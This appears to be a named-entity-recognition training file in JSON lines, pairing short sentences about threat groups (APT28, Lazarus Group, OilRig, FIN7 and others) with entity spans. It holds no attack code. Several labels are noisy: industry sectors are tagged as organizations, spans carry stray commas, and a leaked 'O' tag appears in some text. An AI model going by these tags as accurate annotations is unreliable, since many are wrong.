.", "spans": {"Organization: Threat Group-1314": [[0, 17]], "Organization: TG-1314": [[20, 27]]}, "info": {"id": "aptner_train_002633", "source": "aptner_train"}} {"text": "Threat Group-1314 is an unattributed threat group that has used", "spans": {"Organization: Threat Group-1314": [[0, 17]]}, "info": {"id": "aptner_train_002634", "source": "aptner_train"}} {"text": "compromised credentials to log into a victim ’s remote access infrastructure .", "spans": {}, "info": {"id": "aptner_train_002635", "source": "aptner_train"}} {"text": "Threat Group-3390 : TG-3390 ,Emissary Panda , BRONZE UNION , APT27 , Iron Tiger , LuckyMouse .", "spans": {"Organization: Threat Group-3390": [[0, 17]], "Organization: TG-3390": [[20, 27]], "Organization: ,Emissary Panda": [[28, 43]], "Organization: BRONZE UNION": [[46, 58]], "Organization: APT27": [[61, 66]], "Organization: Iron Tiger": [[69, 79]], "Organization: LuckyMouse": [[82, 92]]}, "info": {"id": "aptner_train_002636", "source": "aptner_train"}} {"text": "Threat Group-3390 is a Chinese threat group that extensively used strategic Web compromises to target victims .", "spans": {"Organization: Threat Group-3390": [[0, 17]]}, "info": {"id": "aptner_train_002637", "source": "aptner_train"}} {"text": "The group has been active since at least 2010 and has targeted organizations in the aerospace , government , defense , technology ,O energy , and manufacturing sectors .", "spans": {"Organization: aerospace": [[84, 93]], "Organization: government": [[96, 106]], "Organization: defense": [[109, 116]], "Organization: technology": [[119, 129]], "Organization: energy": [[133, 139]], "Organization: manufacturing sectors": [[146, 167]]}, "info": {"id": "aptner_train_002638", "source": "aptner_train"}} {"text": "Thrip is an espionage group that has targeted satellite communications ,telecoms ,and defense contractor companies in the U.S. 
and Southeast Asia .", "spans": {"Organization: Thrip": [[0, 5]]}, "info": {"id": "aptner_train_002639", "source": "aptner_train"}} {"text": "The group uses custom malware as well as “ living off the land ” techniques .", "spans": {}, "info": {"id": "aptner_train_002640", "source": "aptner_train"}} {"text": "NEODYMIUM is an activity group that conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {"Organization: NEODYMIUM": [[0, 9]]}, "info": {"id": "aptner_train_002641", "source": "aptner_train"}} {"text": "The group has demonstrated similarity to another activity group called O PROMETHIUM due to overlapping victim and campaign characteristics .", "spans": {"Organization: PROMETHIUM": [[73, 83]]}, "info": {"id": "aptner_train_002642", "source": "aptner_train"}} {"text": "NEODYMIUM is reportedly associated closely with O BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"Organization: NEODYMIUM": [[0, 9]], "Organization: BlackOasis": [[50, 60]]}, "info": {"id": "aptner_train_002643", "source": "aptner_train"}} {"text": "Night Dragon is a campaign name for activity involving a threat group that has conducted activity originating primarily in China .", "spans": {"Organization: Night Dragon": [[0, 12]]}, "info": {"id": "aptner_train_002644", "source": "aptner_train"}} {"text": "OilRig : IRN2 , HELIX KITTEN , APT34 .", "spans": {"Organization: OilRig": [[0, 6]], "Organization: IRN2": [[9, 13]], "Organization: HELIX KITTEN": [[16, 28]], "Organization: APT34": [[31, 36]]}, "info": {"id": "aptner_train_002645", "source": "aptner_train"}} {"text": "OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014 .", "spans": {"Organization: OilRig": [[0, 6]]}, "info": {"id": "aptner_train_002646", "source": "aptner_train"}} {"text": "The group has targeted a variety of industries , including financial , government , energy , 
chemical , and telecommunications , and has largely focused its operations within the Middle East .", "spans": {"Organization: financial": [[59, 68]], "Organization: government": [[71, 81]], "Organization: energy": [[84, 90]], "Organization: chemical": [[93, 101]], "Organization: telecommunications": [[108, 126]]}, "info": {"id": "aptner_train_002647", "source": "aptner_train"}} {"text": "It appears the group carries out supply chain attacks , leveraging the trust relationship between organizations to attack their primary targets .", "spans": {}, "info": {"id": "aptner_train_002648", "source": "aptner_train"}} {"text": "FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran , use of Iranian infrastructure , and targeting that aligns with nation-state interests .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: Iranian government": [[55, 73]]}, "info": {"id": "aptner_train_002649", "source": "aptner_train"}} {"text": "This group was previously tracked under two distinct groups , APT34 and OilRig , but was combined due to additional reporting giving higher confidence about the overlap of the activity .", "spans": {"Organization: APT34": [[62, 67]], "Organization: OilRig": [[72, 78]]}, "info": {"id": "aptner_train_002650", "source": "aptner_train"}} {"text": "APT16 is a China based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations .", "spans": {"Organization: APT16": [[0, 5]]}, "info": {"id": "aptner_train_002651", "source": "aptner_train"}} {"text": "APT17 : Deputy Dog .", "spans": {"Organization: APT17": [[0, 5]], "Organization: Deputy Dog": [[8, 18]]}, "info": {"id": "aptner_train_002652", "source": "aptner_train"}} {"text": "APT17 is a China based threat group that has conducted network intrusions against U.S. 
government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations .", "spans": {"Organization: APT17": [[0, 5]], "Organization: law firms": [[132, 141]], "Organization: information technology companies": [[144, 176]], "Organization: mining companies": [[179, 195]]}, "info": {"id": "aptner_train_002653", "source": "aptner_train"}} {"text": "APT18 : TG-0416 , Dynamite Panda , Threat Group-0416 .", "spans": {"Organization: APT18": [[0, 5]], "Organization: TG-0416": [[8, 15]], "Organization: Dynamite Panda": [[18, 32]], "Organization: Threat Group-0416": [[35, 52]]}, "info": {"id": "aptner_train_002654", "source": "aptner_train"}} {"text": "APT18 a threat group that has operated since at least 2009 and has targeted a range of industries , including technology , manufacturing , human rights groups , government , and medical .", "spans": {"Organization: APT18": [[0, 5]]}, "info": {"id": "aptner_train_002655", "source": "aptner_train"}} {"text": "Group5 is a threat group with a suspected Iranian nexus , though this attribution is not definite .", "spans": {"Organization: Group5": [[0, 6]]}, "info": {"id": "aptner_train_002656", "source": "aptner_train"}} {"text": "The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes , normally using Syrian and Iranian themes .", "spans": {}, "info": {"id": "aptner_train_002657", "source": "aptner_train"}} {"text": "Group5 has used two commonly available remote access tools ( RATs ) , njRAT , as well as an Android RAT , DroidJack .", "spans": {"Organization: Group5": [[0, 6]], "Malware: remote access tools": [[39, 58]], "Malware: RATs": [[61, 65]], "Malware: , njRAT": [[68, 75]], "Malware: Android RAT": [[92, 103]], "Malware: DroidJack": [[106, 115]]}, "info": {"id": "aptner_train_002658", "source": "aptner_train"}} {"text": "Honeybee is a campaign led by an unknown actor that targets humanitarian aid 
organizations and has been active in Vietnam , Singapore , Argentina , Japan , Indonesia , and Canada .", "spans": {}, "info": {"id": "aptner_train_002659", "source": "aptner_train"}} {"text": "It has been an active operation since August of 2017 and as recently as February 2018 .", "spans": {}, "info": {"id": "aptner_train_002660", "source": "aptner_train"}} {"text": "Group7 : APT15 , Mirage , Vixen Panda , GREF , Playful Dragon , RoyalAPT .", "spans": {"Organization: Group7": [[0, 6]], "Organization: APT15": [[9, 14]], "Organization: Mirage": [[17, 23]], "Organization: Vixen Panda": [[26, 37]], "Organization: GREF": [[40, 44]], "Organization: Playful Dragon": [[47, 61]], "Organization: RoyalAPT": [[64, 72]]}, "info": {"id": "aptner_train_002661", "source": "aptner_train"}} {"text": "Ke3chang  is a threat group attributed to actors operating out of China .", "spans": {"Organization: Ke3chang ": [[0, 9]]}, "info": {"id": "aptner_train_002662", "source": "aptner_train"}} {"text": "Ke3chang  has targeted several industries , including oil , government , military , and more .", "spans": {"Organization: Ke3chang ": [[0, 9]]}, "info": {"id": "aptner_train_002663", "source": "aptner_train"}} {"text": "Kimsuky : Velvet Chollima .", "spans": {"Organization: Kimsuky": [[0, 7]], "Organization: Velvet Chollima": [[10, 25]]}, "info": {"id": "aptner_train_002664", "source": "aptner_train"}} {"text": "Kimsuky is a North Korean based threat group that has been active since at least September 2013 .", "spans": {"Organization: Kimsuky": [[0, 7]]}, "info": {"id": "aptner_train_002665", "source": "aptner_train"}} {"text": "The group focuses on targeting Korean think tank as well as DPRK/nuclear-related targets .", "spans": {"Organization: Korean think tank": [[31, 48]], "Organization: DPRK/nuclear-related": [[60, 80]]}, "info": {"id": "aptner_train_002666", "source": "aptner_train"}} {"text": "The group was attributed as the actor behind the Korea Hydro & Nuclear Power Co.compromise 
.", "spans": {"Organization: Korea Hydro & Nuclear Power Co.compromise": [[49, 90]]}, "info": {"id": "aptner_train_002667", "source": "aptner_train"}} {"text": "Lazarus Group : HIDDEN COBRA , Guardians of Peace , ZINC , NICKEL ACADEMY .", "spans": {"Organization: Lazarus Group": [[0, 13]], "Organization: HIDDEN COBRA": [[16, 28]], "Organization: Guardians of Peace": [[31, 49]], "Organization: ZINC": [[52, 56]], "Organization: NICKEL ACADEMY": [[59, 73]]}, "info": {"id": "aptner_train_002668", "source": "aptner_train"}} {"text": "Lazarus Group is a threat group that has been attributed to the North Korean government .", "spans": {"Organization: Lazarus Group": [[0, 13]], "Organization: North Korean government": [[64, 87]]}, "info": {"id": "aptner_train_002669", "source": "aptner_train"}} {"text": "The group has been active since at least 2009 and was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a campaign named Operation Blockbuster by Novetta .", "spans": {"Organization: Sony Pictures Entertainment": [[132, 159]], "Organization: Novetta": [[213, 220]]}, "info": {"id": "aptner_train_002670", "source": "aptner_train"}} {"text": "Malware used by Lazarus Group correlates to other reported campaigns , including Operation Flame , Operation 1Mission , Operation Troy , DarkSeoul , and Ten Days of Rain .", "spans": {"Organization: Lazarus Group": [[16, 29]], "Malware: Operation Flame": [[81, 96]], "Malware: Operation 1Mission": [[99, 117]], "Malware: Operation Troy": [[120, 134]], "Malware: DarkSeoul": [[137, 146]], "Malware: Ten Days of Rain": [[153, 169]]}, "info": {"id": "aptner_train_002671", "source": "aptner_train"}} {"text": "In late 2017 , Lazarus Group used KillDisk , a disk-wiping tool , in an attack against an online casino based in Central America .", "spans": {"Organization: Lazarus Group": [[15, 28]], "Malware: KillDisk": [[34, 42]]}, "info": {"id": "aptner_train_002672", "source": 
"aptner_train"}} {"text": "North Korean group definitions are known to have significant overlap , and the name Lazarus Group is known to encompass a broad range of activity .", "spans": {"Organization: Lazarus Group": [[84, 97]]}, "info": {"id": "aptner_train_002673", "source": "aptner_train"}} {"text": "Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea .", "spans": {"Organization: Lazarus Group": [[32, 45]]}, "info": {"id": "aptner_train_002674", "source": "aptner_train"}} {"text": "Some organizations track North Korean clusters or groups such as Bluenoroff , APT37 , and APT38 separately , while other organizations may track some activity associated with those group names by the name Lazarus Group .", "spans": {"Organization: Bluenoroff": [[65, 75]], "Organization: APT37": [[78, 83]], "Organization: APT38": [[90, 95]], "Organization: Lazarus Group": [[205, 218]]}, "info": {"id": "aptner_train_002675", "source": "aptner_train"}} {"text": "Leafminer : Raspite .", "spans": {"Organization: Leafminer": [[0, 9]], "Organization: Raspite": [[12, 19]]}, "info": {"id": "aptner_train_002676", "source": "aptner_train"}} {"text": "Leafminer is an Iranian threat group that has targeted government organizations and business entities in the Middle East since at least early 2017 .", "spans": {"Organization: Leafminer": [[0, 9]], "Organization: Middle East": [[109, 120]]}, "info": {"id": "aptner_train_002677", "source": "aptner_train"}} {"text": "Elderwood : Elderwood Gang , Beijing Group , Sneaky Panda .", "spans": {"Organization: Elderwood": [[0, 9]], "Organization: Elderwood Gang": [[12, 26]], "Organization: Beijing Group": [[29, 42]], "Organization: Sneaky Panda": [[45, 57]]}, "info": {"id": "aptner_train_002678", "source": "aptner_train"}} {"text": "The group has targeted defense organizations , supply chain manufacturers , human rights and nongovernmental organizations ( NGOs ) , and IT service providers .", "spans": 
{"Organization: defense organizations": [[23, 44]]}, "info": {"id": "aptner_train_002680", "source": "aptner_train"}} {"text": "Equation is a sophisticated threat group that employs multiple remote access tools .", "spans": {"Organization: Equation": [[0, 8]], "Malware: remote access tools": [[63, 82]]}, "info": {"id": "aptner_train_002681", "source": "aptner_train"}} {"text": "The group is known to use zero-day exploits and has developed the capability to overwrite the firmware of hard disk drives .", "spans": {"Vulnerability: zero-day exploits": [[26, 43]]}, "info": {"id": "aptner_train_002682", "source": "aptner_train"}} {"text": "FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016 .", "spans": {"Organization: FIN10": [[0, 5]]}, "info": {"id": "aptner_train_002683", "source": "aptner_train"}} {"text": "The group uses stolen data exfiltrated from victims to extort organizations .", "spans": {}, "info": {"id": "aptner_train_002684", "source": "aptner_train"}} {"text": "Patchwork : Dropping Elephant , Chinastrats , MONSOON , Operation Hangover .", "spans": {"Organization: Patchwork": [[0, 9]], "Organization: Dropping Elephant": [[12, 29]], "Organization: Chinastrats": [[32, 43]], "Organization: MONSOON": [[46, 53]], "Organization: Operation Hangover": [[56, 74]]}, "info": {"id": "aptner_train_002686", "source": "aptner_train"}} {"text": "Patchwork is a cyberespionage group that was first observed in December 2015 .", "spans": {"Organization: Patchwork": [[0, 9]]}, "info": {"id": "aptner_train_002687", "source": "aptner_train"}} {"text": "While the group has not been definitively attributed , circumstantial evidence suggests the group may be a pro-Indian or Indian entity .", "spans": {}, "info": {"id": "aptner_train_002688", "source": "aptner_train"}} {"text": "Patchwork has been seen targeting industries related to diplomatic and government agencies .", "spans": {"Organization: Patchwork": 
[[0, 9]], "Organization: diplomatic": [[56, 66]], "Organization: government agencies": [[71, 90]]}, "info": {"id": "aptner_train_002689", "source": "aptner_train"}} {"text": "Much of the code used by this group was copied and pasted from online forums .", "spans": {}, "info": {"id": "aptner_train_002690", "source": "aptner_train"}} {"text": "Patchwork was also seen operating spearphishing campaigns targeting U.S. think tank groups in March and April of 2018 .", "spans": {"Organization: Patchwork": [[0, 9]]}, "info": {"id": "aptner_train_002691", "source": "aptner_train"}} {"text": "PittyTiger is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control .", "spans": {"Organization: PittyTiger": [[0, 10]]}, "info": {"id": "aptner_train_002692", "source": "aptner_train"}} {"text": "Unknown .", "spans": {}, "info": {"id": "aptner_train_002693", "source": "aptner_train"}} {"text": "Release_Time : unknow Report_URL : https://attack.mitre.org/groups/ APT19 : Codoso , C0d0so0 , Codoso Team , Sunshop Group .", "spans": {"Organization: APT19": [[68, 73]], "Organization: Codoso": [[76, 82]], "Organization: C0d0so0": [[85, 92]], "Organization: Codoso Team": [[95, 106]], "Organization: Sunshop Group": [[109, 122]]}, "info": {"id": "aptner_train_002694", "source": "aptner_train"}} {"text": "APT19 a Chinese-based threat group that has targeted a variety of industries , including defense , finance , energy , pharmaceutical , telecommunications , high tech , education , manufacturing , and legal services .", "spans": {"Organization: APT19": [[0, 5]]}, "info": {"id": "aptner_train_002695", "source": "aptner_train"}} {"text": "In 2017 , a phishing campaign was used to target seven law and investment firms .", "spans": {}, "info": {"id": "aptner_train_002696", "source": "aptner_train"}} {"text": "Some analysts track APT19 Panda the same group , but it is unclear from open source information if the groups are the same 
.", "spans": {"Organization: track APT19": [[14, 25]]}, "info": {"id": "aptner_train_002697", "source": "aptner_train"}} {"text": "APT28 : SNAKEMACKEREL , Swallowtail , Group 74 , Sednit , Sofacy , Pawn Storm , Fancy Bear , STRONTIUM , Tsar Team , Threat Group-4127 , TG-4127 .", "spans": {"Organization: APT28": [[0, 5]], "Organization: SNAKEMACKEREL": [[8, 21]], "Organization: Swallowtail": [[24, 35]], "Organization: Group 74": [[38, 46]], "Organization: Sednit": [[49, 55]], "Organization: Sofacy": [[58, 64]], "Organization: Pawn Storm": [[67, 77]], "Organization: Fancy Bear": [[80, 90]], "Organization: STRONTIUM": [[93, 102]], "Organization: Tsar Team": [[105, 114]], "Organization: Threat Group-4127": [[117, 134]], "Organization: TG-4127": [[137, 144]]}, "info": {"id": "aptner_train_002698", "source": "aptner_train"}} {"text": "APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": {"Organization: APT28": [[0, 5]], "Organization: Russia's Main Intelligence Directorate of the Russian General Staff": [[52, 119]], "Organization: U.S. Department of Justice": [[135, 161]]}, "info": {"id": "aptner_train_002699", "source": "aptner_train"}} {"text": "This group reportedly compromised the Hillary Clinton campaign , the Democratic National Committee , and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. 
presidential election .", "spans": {"Organization: Democratic National Committee": [[69, 98]], "Organization: Democratic Congressional Campaign Committee": [[109, 152]]}, "info": {"id": "aptner_train_002700", "source": "aptner_train"}} {"text": "APT28 has been active since at least 2004 .", "spans": {"Organization: APT28": [[0, 5]]}, "info": {"id": "aptner_train_002701", "source": "aptner_train"}} {"text": "APT29 : YTTRIUM , The Dukes , Cozy Bear , CozyDuke .", "spans": {"Organization: APT29": [[0, 5]], "Organization: YTTRIUM": [[8, 15]], "Organization: The Dukes": [[18, 27]], "Organization: Cozy Bear": [[30, 39]], "Organization: CozyDuke": [[42, 50]]}, "info": {"id": "aptner_train_002702", "source": "aptner_train"}} {"text": "APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008 .", "spans": {"Organization: APT29": [[0, 5]], "Organization: Russian government": [[56, 74]]}, "info": {"id": "aptner_train_002703", "source": "aptner_train"}} {"text": "This group reportedly compromised the Democratic National Committee starting in the summer of 2015 .", "spans": {"Organization: Democratic National Committee": [[38, 67]]}, "info": {"id": "aptner_train_002704", "source": "aptner_train"}} {"text": "PLATINUM is an activity group that has targeted victims since at least 2009 .", "spans": {"Organization: PLATINUM": [[0, 8]]}, "info": {"id": "aptner_train_002705", "source": "aptner_train"}} {"text": "The group has focused on targets associated with governments and related organizations in South and Southeast Asia .", "spans": {"Organization: governments": [[49, 60]], "Organization: organizations": [[73, 86]]}, "info": {"id": "aptner_train_002706", "source": "aptner_train"}} {"text": "Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005 .", "spans": {"Organization: Poseidon Group": [[0, 14]]}, "info": {"id": "aptner_train_002707", "source": "aptner_train"}} {"text": "The group has a 
history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm .", "spans": {"Organization: Poseidon Group": [[121, 135]]}, "info": {"id": "aptner_train_002708", "source": "aptner_train"}} {"text": "The group conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {}, "info": {"id": "aptner_train_002710", "source": "aptner_train"}} {"text": "PROMETHIUM has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics .", "spans": {"Organization: PROMETHIUM": [[0, 10]], "Organization: NEODYMIUM": [[72, 81]]}, "info": {"id": "aptner_train_002711", "source": "aptner_train"}} {"text": "APT33 : Elfin . APT33 is a suspected Iranian threat group that has carried out operations since at least 2013 .", "spans": {"Organization: APT33": [[0, 5], [16, 21]], "Organization: Elfin": [[8, 13]]}, "info": {"id": "aptner_train_002712", "source": "aptner_train"}} {"text": "The group has targeted organizations across multiple industries in the United States , Saudi Arabia , and South Korea , with a particular interest in the aviation and energy sectors .", "spans": {}, "info": {"id": "aptner_train_002713", "source": "aptner_train"}} {"text": "APT37 : ScarCruft , Reaper , Group123 , TEMP.Reaper . APT37 is a suspected North Korean cyber espionage group that has been active since at least 2012 .", "spans": {"Organization: APT37": [[0, 5], [54, 59]], "Organization: ScarCruft": [[8, 17]], "Organization: Reaper": [[20, 26]], "Organization: Group123": [[29, 37]], "Organization: TEMP.Reaper": [[40, 51]]}, "info": {"id": "aptner_train_002714", "source": "aptner_train"}} {"text": "The group has targeted victims primarily in South Korea , but also in Japan , Vietnam , Russia , Nepal , China , India , Romania , Kuwait , and other parts of the Middle East .", "spans": {}, "info": {"id": "aptner_train_002715", "source": "aptner_train"}} 
{"text": "APT37 has also been linked to the following campaigns between 2016-2018 : Operation Daybreak , Operation Erebus , Golden Time , Evil New Year , Are you Happy? , FreeMilk , Northern Korean Human Rights , and Evil New Year 2018 .", "spans": {"Organization: APT37": [[0, 5]]}, "info": {"id": "aptner_train_002716", "source": "aptner_train"}} {"text": "APT38 is a financially-motivated threat group that is backed by the North Korean regime .", "spans": {"Organization: APT38": [[0, 5]]}, "info": {"id": "aptner_train_002717", "source": "aptner_train"}} {"text": "The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014 . APT3 : Gothic Panda , Pirpi , UPS Team , Buckeye , Threat Group-0110 , TG-0110 .", "spans": {"Organization: APT3": [[149, 153]], "Organization: Gothic Panda": [[156, 168]], "Organization: Pirpi": [[171, 176]], "Organization: UPS Team": [[179, 187]], "Organization: Buckeye": [[190, 197]], "Organization: Threat Group-0110": [[200, 217]], "Organization: TG-0110": [[220, 227]]}, "info": {"id": "aptner_train_002718", "source": "aptner_train"}} {"text": "APT3 is a China based threat group that researchers have attributed to China's Ministry of State Security .", "spans": {"Organization: APT3": [[0, 4]], "Organization: China's Ministry of State Security": [[71, 105]]}, "info": {"id": "aptner_train_002719", "source": "aptner_train"}} {"text": "This group is responsible for the campaigns known as Operation Clandestine Fox , Operation Clandestine Wolf , and Operation Double Tap .", "spans": {}, "info": {"id": "aptner_train_002720", "source": "aptner_train"}} {"text": "As of June 2015 , the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong .", "spans": {}, "info": {"id": "aptner_train_002721", "source": "aptner_train"}} {"text": "MITRE has also developed an APT3 Adversary Emulation Plan .", 
"spans": {"Organization: MITRE": [[0, 5]], "Organization: APT3": [[28, 32]]}, "info": {"id": "aptner_train_002722", "source": "aptner_train"}} {"text": "APT30 is a threat group suspected to be associated with the Chinese government .", "spans": {"Organization: APT30": [[0, 5]], "Organization: Chinese government": [[60, 78]]}, "info": {"id": "aptner_train_002723", "source": "aptner_train"}} {"text": "While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": {"Organization: Naikon": [[6, 12]], "Organization: APT30": [[46, 51]]}, "info": {"id": "aptner_train_002724", "source": "aptner_train"}} {"text": "APT32 : SeaLotus , OceanLotus , APT-C-00 .", "spans": {"Organization: APT32": [[0, 5]], "Organization: SeaLotus": [[8, 16]], "Organization: OceanLotus": [[19, 29]], "Organization: APT-C-00": [[32, 40]]}, "info": {"id": "aptner_train_002725", "source": "aptner_train"}} {"text": "APT32 is a threat group that has been active since at least 2014 .", "spans": {"Organization: APT32": [[0, 5]]}, "info": {"id": "aptner_train_002726", "source": "aptner_train"}} {"text": "The group has targeted multiple private sector industries as well as foreign governments , dissidents , and journalists with a strong focus on Southeast Asian countries like Vietnam , the Philippines , Laos , and Cambodia .", "spans": {}, "info": {"id": "aptner_train_002727", "source": "aptner_train"}} {"text": "They have extensively used strategic web compromises to compromise victims .", "spans": {"System: strategic web compromises": [[27, 52]]}, "info": {"id": "aptner_train_002728", "source": "aptner_train"}} {"text": "The group is believed to be Vietnam based .", "spans": {}, "info": {"id": "aptner_train_002729", "source": "aptner_train"}} {"text": "FIN7 : Carbanak Group .", "spans": {"Organization: FIN7": [[0, 4]], "Organization: Carbanak Group": [[7, 21]]}, "info": {"id": "aptner_train_002730", "source": "aptner_train"}} {"text": "FIN7 is a 
financially-motivated threat group that has primarily targeted the U.S. retail , restaurant , and hospitality sectors since mid-2015 .", "spans": {"Organization: FIN7": [[0, 4]]}, "info": {"id": "aptner_train_002731", "source": "aptner_train"}} {"text": "They often use point-of-sale malware .", "spans": {"System: point-of-sale": [[15, 28]]}, "info": {"id": "aptner_train_002732", "source": "aptner_train"}} {"text": "A portion of FIN7 was run out of a front company called Combi Security .", "spans": {"Organization: FIN7": [[13, 17]], "Organization: Combi Security": [[56, 70]]}, "info": {"id": "aptner_train_002733", "source": "aptner_train"}} {"text": "FIN7 is sometimes referred to as Carbanak Group , but these appear to be two groups using the same Carbanak malware and are therefore tracked separately .", "spans": {"Organization: FIN7": [[0, 4]], "Organization: Carbanak Group": [[33, 47]], "Malware: Carbanak": [[99, 107]]}, "info": {"id": "aptner_train_002734", "source": "aptner_train"}} {"text": "FIN8 is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail , restaurant , and hospitality industries .", "spans": {"Organization: FIN8": [[0, 4]]}, "info": {"id": "aptner_train_002735", "source": "aptner_train"}} {"text": "Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017 .", "spans": {"Organization: Gallmaker": [[0, 9]]}, "info": {"id": "aptner_train_002736", "source": "aptner_train"}} {"text": "The group has mainly targeted victims in the defense , military , and government sectors .", "spans": {}, "info": {"id": "aptner_train_002737", "source": "aptner_train"}} {"text": "DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016 .", "spans": {"Organization: DarkHydrus": [[0, 10]]}, "info": {"id": "aptner_train_002738", "source": "aptner_train"}} {"text": "The 
group heavily leverages open-source tools and custom payloads for carrying out attacks .", "spans": {}, "info": {"id": "aptner_train_002739", "source": "aptner_train"}} {"text": "Deep Panda : Shell Crew , WebMasters , KungFu Kittens , PinkPanther , Black Vine .", "spans": {"Organization: Deep Panda": [[0, 10]], "Organization: Shell Crew": [[13, 23]], "Organization: WebMasters": [[26, 36]], "Organization: KungFu Kittens": [[39, 53]], "Organization: PinkPanther": [[56, 67]], "Organization: Black Vine": [[70, 80]]}, "info": {"id": "aptner_train_002740", "source": "aptner_train"}} {"text": "Deep Panda is a suspected Chinese threat group known to target many industries , including government , defense , financial , and telecommunications .", "spans": {"Organization: Deep Panda": [[0, 10]]}, "info": {"id": "aptner_train_002741", "source": "aptner_train"}} {"text": "The intrusion into healthcare company Anthem has been attributed to Deep Panda .", "spans": {"Organization: Anthem": [[38, 44]], "Organization: to Deep Panda": [[65, 78]]}, "info": {"id": "aptner_train_002742", "source": "aptner_train"}} {"text": "This group is also known as Shell Crew , WebMasters , KungFu Kittens , and PinkPanther .", "spans": {"Organization: Shell Crew": [[28, 38]], "Organization: WebMasters": [[41, 51]], "Organization: KungFu Kittens": [[54, 68]], "Organization: PinkPanther": [[75, 86]]}, "info": {"id": "aptner_train_002743", "source": "aptner_train"}} {"text": "Deep Panda appears to be known as Black Vine based on the attribution of both group names to the Anthem intrusion .", "spans": {"Organization: Deep Panda": [[0, 10]], "Organization: Black Vine": [[34, 44]], "Organization: Anthem": [[97, 103]]}, "info": {"id": "aptner_train_002744", "source": "aptner_train"}} {"text": "Some analysts track Deep Panda and APT19 as the same group , but it is unclear from open source information if the groups are the same .", "spans": {"Organization: track Deep Panda": [[14, 30]]}, "info": 
{"id": "aptner_train_002745", "source": "aptner_train"}} {"text": "Dragonfly : Energetic Bear .", "spans": {"Organization: Dragonfly": [[0, 9]], "Organization: Energetic Bear": [[12, 26]]}, "info": {"id": "aptner_train_002746", "source": "aptner_train"}} {"text": "Dragonfly is a cyber espionage group that has been active since at least 2011 .", "spans": {"Organization: Dragonfly": [[0, 9]]}, "info": {"id": "aptner_train_002747", "source": "aptner_train"}} {"text": "They initially targeted defense and aviation companies but shifted to focus on the energy sector in early 2013 .", "spans": {}, "info": {"id": "aptner_train_002748", "source": "aptner_train"}} {"text": "They have also targeted companies related to industrial control systems .", "spans": {}, "info": {"id": "aptner_train_002749", "source": "aptner_train"}} {"text": "A similar group emerged in 2015 and was identified by Symantec as Dragonfly 2.0 .", "spans": {"Organization: Symantec": [[54, 62]], "Organization: Dragonfly 2.0": [[66, 79]]}, "info": {"id": "aptner_train_002750", "source": "aptner_train"}} {"text": "There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0 , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {"Organization: Dragonfly 2.0": [[69, 82]]}, "info": {"id": "aptner_train_002751", "source": "aptner_train"}} {"text": "Dragonfly 2.0 : Berserk Bear .", "spans": {"Organization: Dragonfly 2.0": [[0, 13]], "Organization: Berserk Bear": [[16, 28]]}, "info": {"id": "aptner_train_002752", "source": "aptner_train"}} {"text": "There is debate over the extent of overlap between Dragonfly 2.0 and Dragonfly , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {"Organization: Dragonfly 2.0": [[51, 64]], "Organization: Dragonfly": [[69, 78]]}, "info": {"id": "aptner_train_002754", "source": "aptner_train"}} {"text": "Due to overlapping TTPs , including similar 
custom tools , DragonOK is thought to have a direct or indirect relationship with the threat group Moafee .", "spans": {"Organization: DragonOK": [[59, 67]], "Organization: group Moafee": [[137, 149]]}, "info": {"id": "aptner_train_002756", "source": "aptner_train"}} {"text": "It is known to use a variety of malware , including Sysget / HelloBridge , PlugX , PoisonIvy , FormerFirstRat , NFlog , and NewCT .", "spans": {"Malware: Sysget": [[52, 58]], "Malware: HelloBridge": [[61, 72]], "Malware: PlugX": [[75, 80]], "Malware: PoisonIvy": [[83, 92]], "Malware: FormerFirstRat": [[95, 109]], "Malware: NFlog": [[112, 117]], "Malware: NewCT": [[124, 129]]}, "info": {"id": "aptner_train_002757", "source": "aptner_train"}} {"text": "Dust Storm is a threat group that has targeted multiple industries in Japan , South Korea , the United States , Europe , and several Southeast Asian countries .", "spans": {"Organization: Dust Storm": [[0, 10]]}, "info": {"id": "aptner_train_002758", "source": "aptner_train"}} {"text": "CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013 .", "spans": {"Organization: CopyKittens": [[0, 11]]}, "info": {"id": "aptner_train_002759", "source": "aptner_train"}} {"text": "It has targeted countries including Israel , Saudi Arabia , Turkey , the U.S. 
